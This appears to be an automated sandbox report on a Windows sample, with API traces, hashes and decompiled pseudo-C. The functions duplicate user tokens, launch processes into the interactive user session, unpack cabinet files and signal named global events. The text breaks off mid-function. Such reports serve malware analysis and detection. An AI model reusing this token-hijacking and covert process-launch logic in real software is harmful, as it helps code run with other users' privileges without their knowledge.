                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$H_prolog3__swprintf$DeleteEnterLeave
                                                                                                                        • String ID: HTTPIN$HTTPPING$HTTP_$PING_ERROR$PING_NOCONNECT$PING_RUNNING$PING_SERVERONLY$PingResult$TCPIN$TCPPING$TCP_
                                                                                                                        • API String ID: 3407804901-2695655189
                                                                                                                        • Opcode ID: 9ddb597525aa8fa8787abcf9a7793391a2a071c3ce2bcfc76f73ef6282eb22d8
                                                                                                                        • Instruction ID: 77eb52bb5fd74d7fbc4ecb358810aabdfbe56e85957c85d4d8cbdc750f51cc6e
                                                                                                                        • Opcode Fuzzy Hash: 9ddb597525aa8fa8787abcf9a7793391a2a071c3ce2bcfc76f73ef6282eb22d8
                                                                                                                        • Instruction Fuzzy Hash: 6AA16F7141418CEADB15EBA4CD91FED7B68BF22308F14809EF446671A2EB786F08C765
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 005540A0, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 164libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,00899BB8,00542D81,00899BB8,Microsoft Visual C++ Runtime Library,00012010), ref: 005540CD
                                                                                                                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 005540E9
                                                                                                                          • Part of subcall function 00542E64: TlsGetValue.KERNEL32(0054B9C9,0054BA49,0054B9C9,00000014,005445B6,00000000,00000FA0,007D5C28,0000000C,00544615,005343D6,?,?,00538380,00000004,007D5840), ref: 00542E71
                                                                                                                          • Part of subcall function 00542E64: TlsGetValue.KERNEL32(00000005,?,00538380,00000004,007D5840,0000000C,00540F8F,005343D6,005343D6,00000000,00000000,00000000,005430DD,00000001,00000214), ref: 00542E88
                                                                                                                          • Part of subcall function 00542E64: RtlEncodePointer.NTDLL(005343D6,?,00538380,00000004,007D5840,0000000C,00540F8F,005343D6,005343D6,00000000,00000000,00000000,005430DD,00000001,00000214), ref: 00542EC6
                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00554106
                                                                                                                          • Part of subcall function 00542E64: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00538380,00000004,007D5840,0000000C,00540F8F,005343D6,005343D6,00000000,00000000,00000000,005430DD,00000001,00000214), ref: 00542E9D
                                                                                                                          • Part of subcall function 00542E64: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00542EB8
                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0055411B
                                                                                                                        • __invoke_watson.LIBCMT ref: 0055413C
                                                                                                                          • Part of subcall function 0053496B: _memset.LIBCMT ref: 005349F7
                                                                                                                          • Part of subcall function 0053496B: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 00534A15
                                                                                                                          • Part of subcall function 0053496B: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 00534A1F
                                                                                                                          • Part of subcall function 0053496B: UnhandledExceptionFilter.KERNEL32(00000001,?,?,00000000), ref: 00534A29
                                                                                                                          • Part of subcall function 0053496B: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 00534A44
                                                                                                                          • Part of subcall function 0053496B: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00534A4B
                                                                                                                          • Part of subcall function 00542EDB: TlsGetValue.KERNEL32(00000002,00542086,00537225,005343D6,?,005343D6,?), ref: 00542EE8
                                                                                                                          • Part of subcall function 00542EDB: TlsGetValue.KERNEL32(00000005,?,005343D6,?), ref: 00542EFF
                                                                                                                          • Part of subcall function 00542EDB: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,005343D6,?), ref: 00542F14
                                                                                                                          • Part of subcall function 00542EDB: GetProcAddress.KERNEL32(00000000,h$u), ref: 00542F2F
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00554150
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00554168
                                                                                                                        • __invoke_watson.LIBCMT ref: 005541DB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerEncodeLibraryLoadPointerPresentTerminate_memset
                                                                                                                        • String ID: GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                        • API String ID: 1761029719-1046234306
                                                                                                                        • Opcode ID: 8e36c562a34fa3a8003997fbed7f9861127b98905e41a8df5dd2ace899955a22
                                                                                                                        • Instruction ID: 1bf957bb3930da4bf3bc1a787134835c67a700edfaad2c2e300750af9b68224f
                                                                                                                        • Opcode Fuzzy Hash: 8e36c562a34fa3a8003997fbed7f9861127b98905e41a8df5dd2ace899955a22
                                                                                                                        • Instruction Fuzzy Hash: 83419371D00226AACF34EFB19C99AAE7FB8BA5431AF54452BF801E3150DB7489C4CE91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333610, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80sleepprocessCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 69%
                                                                                                                        			E6F333610(intOrPtr _a8) {
				WCHAR* _v24;
				struct _STARTUPINFOW _v96;
				struct _PROCESS_INFORMATION _v112;
				long _v116;
				void* _v120;
				void* _t19;
				void* _t26;
				WCHAR* _t29;
				void* _t37;
				intOrPtr _t38;

				_push(_a8);
				_t19 = E6F3334B0();
				_t37 = _t19;
				_t38 = 0;
				if(_t37 != 0) {
					_push(0);
					_push(_t37);
					_push( &(_v96.lpReserved));
					_v96.lpDesktop = 0x20;
					_v96.lpReserved = 0;
					L6F33C37E();
					if(_t19 != 0) {
						_v112.dwThreadId = 0x420;
					}
					_push(0x44);
					_push( &(_v96.dwX));
					L6F33C2EE();
					_push(0x10);
					_push( &(_v112.dwProcessId));
					_v96.lpDesktop = 0x44;
					_v96.dwX = L"Winsta0\\Default";
					L6F33C2EE();
					_t29 = _v24;
					while(CreateProcessAsUserW(_t37, 0, _t29, 0, 0, 0, _v116, _v120, 0,  &_v96,  &_v112) == 0) {
						Sleep(0x1f4);
						_t38 = _t38 + 1;
						if(_t38 < 0x78) {
							continue;
						}
						L8:
						_t26 = _v120;
						if(_t26 != 0) {
							_push(_t26);
							L6F33C378();
						}
						return CloseHandle(_t37);
					}
					CloseHandle(_v112.hThread);
					CloseHandle(_v112);
					goto L8;
				}
				return _t19;
			}













                                                                                                                        0x6f333619
                                                                                                                        0x6f33361a
                                                                                                                        0x6f33361f
                                                                                                                        0x6f333621
                                                                                                                        0x6f333628
                                                                                                                        0x6f33362e
                                                                                                                        0x6f33362f
                                                                                                                        0x6f333634
                                                                                                                        0x6f333635
                                                                                                                        0x6f33363d
                                                                                                                        0x6f333641
                                                                                                                        0x6f333648
                                                                                                                        0x6f33364a
                                                                                                                        0x6f33364a
                                                                                                                        0x6f333654
                                                                                                                        0x6f33365a
                                                                                                                        0x6f33365b
                                                                                                                        0x6f333660
                                                                                                                        0x6f333666
                                                                                                                        0x6f333667
                                                                                                                        0x6f33366f
                                                                                                                        0x6f333677
                                                                                                                        0x6f33367c
                                                                                                                        0x6f333686
                                                                                                                        0x6f3336b1
                                                                                                                        0x6f3336b7
                                                                                                                        0x6f3336bb
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3336d9
                                                                                                                        0x6f3336d9
                                                                                                                        0x6f3336e1
                                                                                                                        0x6f3336e3
                                                                                                                        0x6f3336e4
                                                                                                                        0x6f3336e4
                                                                                                                        0x00000000
                                                                                                                        0x6f3336ea
                                                                                                                        0x6f3336d0
                                                                                                                        0x6f3336d7
                                                                                                                        0x00000000
                                                                                                                        0x6f3336d7
                                                                                                                        0x6f3336f1

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F3334B0: WTSEnumerateSessionsA.WTSAPI32(00000000,00000000,00000001,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F3334DE
                                                                                                                          • Part of subcall function 6F3334B0: WTSFreeMemory.WTSAPI32(?,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F33353C
                                                                                                                          • Part of subcall function 6F3334B0: Sleep.KERNEL32(000001F4,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F33354C
                                                                                                                        • CreateEnvironmentBlock.USERENV ref: 6F333641
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 6F33365B
                                                                                                                        • RtlZeroMemory.NTDLL ref: 6F333677
                                                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000020,?,00000000,?,00000020,?,?,?,00000010,?), ref: 6F3336A6
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,00000010,?,00000044,00000000), ref: 6F3336B1
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000010,?,00000044,00000000), ref: 6F3336D0
                                                                                                                        • CloseHandle.KERNEL32(00000020,?,?,?,00000010,?,00000044,00000000), ref: 6F3336D7
                                                                                                                        • DestroyEnvironmentBlock.USERENV(?,?,00000010,?,00000044,00000000), ref: 6F3336E4
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000010,?,00000044,00000000), ref: 6F3336EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleMemory$BlockCreateEnvironmentSleepZero$DestroyEnumerateFreeProcessSessionsUser
                                                                                                                        • String ID: $D
                                                                                                                        • API String ID: 826248435-1196817373
                                                                                                                        • Opcode ID: 2f2956be3448f8421239fff0721c35f5c2ad7631132987e81a7fe7c3b17f3ee8
                                                                                                                        • Instruction ID: 7d98abb27de6b560100ab5b648fe3f8b3eeb76671e6fb0a2d26e1fc012b2fd68
                                                                                                                        • Opcode Fuzzy Hash: 2f2956be3448f8421239fff0721c35f5c2ad7631132987e81a7fe7c3b17f3ee8
                                                                                                                        • Instruction Fuzzy Hash: 762171B2A043A5AFE610DB64CC81F6B77ECEB85754F00490DF690A7280D774E8098BA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3312C0, Relevance: 18.1, APIs: 12, Instructions: 96filestringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 50%
                                                                                                                        			E6F3312C0(char* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v264;
				char _v288;
				char _v300;
				intOrPtr _v304;
				char _v308;
				long _v312;
				char* _t18;
				void* _t20;
				char* _t28;
				char* _t32;
				char* _t40;
				void* _t42;
				intOrPtr _t43;
				long* _t48;

				_t18 =  &_v300;
				_push(_t18);
				_push(0xffffffff);
				_push(E6F3310E0);
				_push(E6F3310D0);
				_push(E6F3310A0);
				_push(E6F331070);
				_push(E6F331000);
				_push(E6F331050);
				_push(E6F331030);
				_v312 = 0;
				L6F33C3A2();
				_t40 = _t18;
				_t48 =  &(( &_v312)[9]);
				if(_t40 == 0) {
					return 0;
				} else {
					_t32 = _a4;
					_t20 = CreateFileA(_t32, 0xc0000000, 3, 0, 3, 0x80, 0);
					_t42 = _t20;
					if(_t42 != 0xffffffff) {
						_push( &_v288);
						_push(_t42);
						_push(_t40);
						L6F33C39C();
						_t48 =  &(_t48[3]);
						CloseHandle(_t42);
						if(_t20 != 0) {
							_t43 = _a12;
							if(_t43 != 0) {
								_v312 = GetTickCount();
								 *0x6f340270 = RtlRandom( &_v312);
							}
							lstrcpyA( &_v264, _t32);
							PathRemoveFileSpecA( &_v264);
							PathAddBackslashA( &_v264);
							_push( &_v308);
							_push(0);
							_push(E6F331100);
							_push(0);
							_push( &_v264);
							_v304 = _a8;
							_v308 = _t43;
							_t28 = PathFindFileNameA(_t32);
							_push(_t28);
							_push(_t40);
							L6F33C396();
							_t48 =  &(_t48[7]);
							_v312 = _t28;
						}
					}
					_push(_t40);
					L6F33C390();
					return _v312;
				}
			}

















                                                                                                                        0x6f3312c8
                                                                                                                        0x6f3312cc
                                                                                                                        0x6f3312cd
                                                                                                                        0x6f3312cf
                                                                                                                        0x6f3312d4
                                                                                                                        0x6f3312d9
                                                                                                                        0x6f3312de
                                                                                                                        0x6f3312e3
                                                                                                                        0x6f3312e8
                                                                                                                        0x6f3312ef
                                                                                                                        0x6f3312f4
                                                                                                                        0x6f3312f8
                                                                                                                        0x6f3312fd
                                                                                                                        0x6f3312ff
                                                                                                                        0x6f331304
                                                                                                                        0x6f3313f1
                                                                                                                        0x6f33130a
                                                                                                                        0x6f33130b
                                                                                                                        0x6f331323
                                                                                                                        0x6f331329
                                                                                                                        0x6f33132e
                                                                                                                        0x6f331339
                                                                                                                        0x6f33133a
                                                                                                                        0x6f33133b
                                                                                                                        0x6f33133c
                                                                                                                        0x6f331341
                                                                                                                        0x6f331347
                                                                                                                        0x6f331350
                                                                                                                        0x6f331352
                                                                                                                        0x6f33135b
                                                                                                                        0x6f331368
                                                                                                                        0x6f331372
                                                                                                                        0x6f331372
                                                                                                                        0x6f33137d
                                                                                                                        0x6f331388
                                                                                                                        0x6f331393
                                                                                                                        0x6f3313a4
                                                                                                                        0x6f3313a5
                                                                                                                        0x6f3313a7
                                                                                                                        0x6f3313ac
                                                                                                                        0x6f3313b2
                                                                                                                        0x6f3313b4
                                                                                                                        0x6f3313b8
                                                                                                                        0x6f3313bc
                                                                                                                        0x6f3313c2
                                                                                                                        0x6f3313c3
                                                                                                                        0x6f3313c4
                                                                                                                        0x6f3313c9
                                                                                                                        0x6f3313cc
                                                                                                                        0x6f3313cc
                                                                                                                        0x6f331350
                                                                                                                        0x6f3313d0
                                                                                                                        0x6f3313d1
                                                                                                                        0x6f3313e6
                                                                                                                        0x6f3313e6

                                                                                                                        APIs
                                                                                                                        • #20.CABINET(6F331030,6F331050,6F331000,6F331070,6F3310A0,6F3310D0,6F3310E0,000000FF,?,00000000,00A56008), ref: 6F3312F8
                                                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 6F331323
                                                                                                                        • #21.CABINET(00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000000,00A56008), ref: 6F33133C
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00A56008), ref: 6F331347
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F33135D
                                                                                                                        • RtlRandom.NTDLL(?), ref: 6F33136C
                                                                                                                        • lstrcpyA.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,00000000,00A56008), ref: 6F33137D
                                                                                                                        • PathRemoveFileSpecA.SHLWAPI(?,?,00000000,?,?,?,?,?,?,?,00000000,00A56008), ref: 6F331388
                                                                                                                        • PathAddBackslashA.SHLWAPI(?,?,00000000,?,?,?,?,?,?,?,00000000,00A56008), ref: 6F331393
                                                                                                                        • PathFindFileNameA.SHLWAPI(?,?,00000000,6F331100,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 6F3313BC
                                                                                                                        • #22.CABINET(00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000000,00A56008), ref: 6F3313C4
                                                                                                                        • #23.CABINET(00000000,?,?,?,?,?,?,?,00000000,00A56008), ref: 6F3313D1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePath$BackslashCloseCountCreateFindHandleNameRandomRemoveSpecTicklstrcpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4034828233-0
                                                                                                                        • Opcode ID: 47e4c7f28988348b9eab2d98d20e0cd3595617a1023614436fd285e0bd34a44e
                                                                                                                        • Instruction ID: cd652085a27cf96906f9469b9a9188b614a61b72a552f45f733ec9de68303c36
                                                                                                                        • Opcode Fuzzy Hash: 47e4c7f28988348b9eab2d98d20e0cd3595617a1023614436fd285e0bd34a44e
                                                                                                                        • Instruction Fuzzy Hash: 5731D473D043A46FC620EB65DC44FAFB7ACAB85770F004A1DF59893180EB75E5148BA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406ACC, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 340COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: char_traits$String_base::_Xlenstd::_
                                                                                                                        • String ID: rd@
                                                                                                                        • API String ID: 1810552321-3749284383
                                                                                                                        • Opcode ID: e6c61859072b801cdf3ab28afa7295efebf5edf704a8ebfc066f3fcec6badcac
                                                                                                                        • Instruction ID: 51698895c2a8d2933d352001331d4ce09a0dab86a7deae28c43ab20f21085153
                                                                                                                        • Opcode Fuzzy Hash: e6c61859072b801cdf3ab28afa7295efebf5edf704a8ebfc066f3fcec6badcac
                                                                                                                        • Instruction Fuzzy Hash: 1AD130B020050AEBCB08CF18CAD4C9AB776FF85300751862AE41AD7695D734FA75CBD9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F335060, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 69threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 95%
                                                                                                                        			E6F335060(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v256;
				char _v264;
				intOrPtr _t11;
				intOrPtr _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t23;
				char* _t24;
				void* _t29;

				_t24 =  &_v264;
				_t18 = _a12;
				_t22 = _a8;
				_t21 = 0;
				if(_t22 != 0 || _t18 != 0) {
					_t29 = M6F34050C - _t21; // 0x1
					if(_t29 != 0) {
						E6F333700("USBManager", 0);
						_t24 =  &(_t24[8]);
					}
					if(_t22 == 0) {
						if(_t18 == 0) {
							goto L8;
						}
						goto L9;
					} else {
						_t11 = M6F34057C; // 0x784250
						wsprintfA( &_v264, "%s%s%c", "Global\\", _t11, 0x52);
						_t23 = OpenEventA(2, 0,  &_v256);
						if(_t23 == 0) {
							goto L10;
						} else {
							SetEvent(_t23);
							CloseHandle(_t23);
							return _t21;
						}
					}
				} else {
					L8:
					_push(0);
					_t21 = E6F334FE0(_a4);
					L9:
					CloseHandle(CreateThread(0, 0, E6F332D50, 0, 0, 0));
					L10:
					return _t21;
				}
			}












                                                                                                                        0x6f335060
                                                                                                                        0x6f335067
                                                                                                                        0x6f33506f
                                                                                                                        0x6f335077
                                                                                                                        0x6f33507b
                                                                                                                        0x6f335081
                                                                                                                        0x6f335087
                                                                                                                        0x6f335090
                                                                                                                        0x6f335095
                                                                                                                        0x6f335095
                                                                                                                        0x6f33509a
                                                                                                                        0x6f3350ed
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33509c
                                                                                                                        0x6f33509c
                                                                                                                        0x6f3350b3
                                                                                                                        0x6f3350cb
                                                                                                                        0x6f3350cf
                                                                                                                        0x00000000
                                                                                                                        0x6f3350d1
                                                                                                                        0x6f3350d2
                                                                                                                        0x6f3350d9
                                                                                                                        0x6f3350ea
                                                                                                                        0x6f3350ea
                                                                                                                        0x6f3350cf
                                                                                                                        0x6f3350ef
                                                                                                                        0x6f3350ef
                                                                                                                        0x6f3350f6
                                                                                                                        0x6f335101
                                                                                                                        0x6f335103
                                                                                                                        0x6f335119
                                                                                                                        0x6f33511f
                                                                                                                        0x6f33512a
                                                                                                                        0x6f33512a

                                                                                                                        APIs
                                                                                                                        • wsprintfA.USER32 ref: 6F3350B3
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F3350C5
                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 6F3350D2
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F3350D9
                                                                                                                        • CreateThread.KERNEL32 ref: 6F335112
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F335119
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventHandle$CreateOpenThreadwsprintf
                                                                                                                        • String ID: %s%s%c$Global\$PBx$USBManager
                                                                                                                        • API String ID: 1587369599-1791046797
                                                                                                                        • Opcode ID: e089052f0348f816e5680bda3b51047975159d037f7dc3bd0d1ce99165cf0e02
                                                                                                                        • Instruction ID: f0e2f0cd991706fad068346b22cdb43a5c9a7f315d357111f002c1193962111e
                                                                                                                        • Opcode Fuzzy Hash: e089052f0348f816e5680bda3b51047975159d037f7dc3bd0d1ce99165cf0e02
                                                                                                                        • Instruction Fuzzy Hash: A9113D77F44BA12BE670E6599C46FDA331DEB85B22F004028FF549A280CA66F41947F5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3334B0, Relevance: 16.6, APIs: 11, Instructions: 134sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 72%
                                                                                                                        			E6F3334B0() {
				void* _t32;
				void* _t33;
				void* _t35;
				void* _t53;
				void* _t55;
				void* _t58;
				void* _t59;
				void* _t61;
				void* _t64;
				void* _t65;

				_t59 =  *(_t65 + 0x20);
				 *(_t65 + 0x10) = 0;
				_t64 = 0;
				do {
					 *(_t65 + 0x20) = 0;
					 *(_t65 + 0x14) = 0;
					if(_t59 != 0xffffffff) {
						_push(_t65 + 0x14);
						_t32 = _t65 + 0x24;
						_push(_t32);
						_push(8);
						_push(_t59);
						_push(0);
						L6F33C36C();
						if(_t32 == 0) {
							goto L14;
						} else {
							_t35 =  *(_t65 + 0x20);
							if( *_t35 == 0) {
								 *(_t65 + 0x10) = 1;
							}
							_push(_t35);
							goto L13;
						}
					} else {
						_t33 = _t65 + 0x14;
						_push(_t33);
						_push(_t65 + 0x24);
						_push(1);
						_push(0);
						_push(0);
						L6F33C372();
						if(_t33 == 0) {
							goto L14;
						} else {
							_t55 =  *(_t65 + 0x14);
							_t61 =  *(_t65 + 0x20);
							_t53 = 0;
							_t35 = _t61;
							if(_t55 <= 0) {
								L8:
								_push(_t61);
							} else {
								while( *((intOrPtr*)(_t35 + 8)) != 0) {
									_t53 = _t53 + 1;
									_t35 = _t35 + 0xc;
									if(_t53 < _t55) {
										continue;
									} else {
										_push(_t61);
									}
									goto L13;
								}
								_t59 =  *_t35;
								 *(_t65 + 0x10) = 1;
								goto L8;
							}
							L13:
							L6F33C366();
							if( *(_t65 + 0x10) != 0) {
								_push(_t65 + 0x14);
								_push(_t59);
								 *((intOrPtr*)(_t65 + 0x1c)) = 0;
								L6F33C360();
								if(_t35 == 0) {
									break;
								} else {
									 *((intOrPtr*)(_t65 + 0x38)) = 0;
									if(DuplicateTokenEx( *(_t65 + 0x14), 0x2000000, 0, 1, 1, _t65 + 0x20) == 0) {
										break;
									} else {
										_push(4);
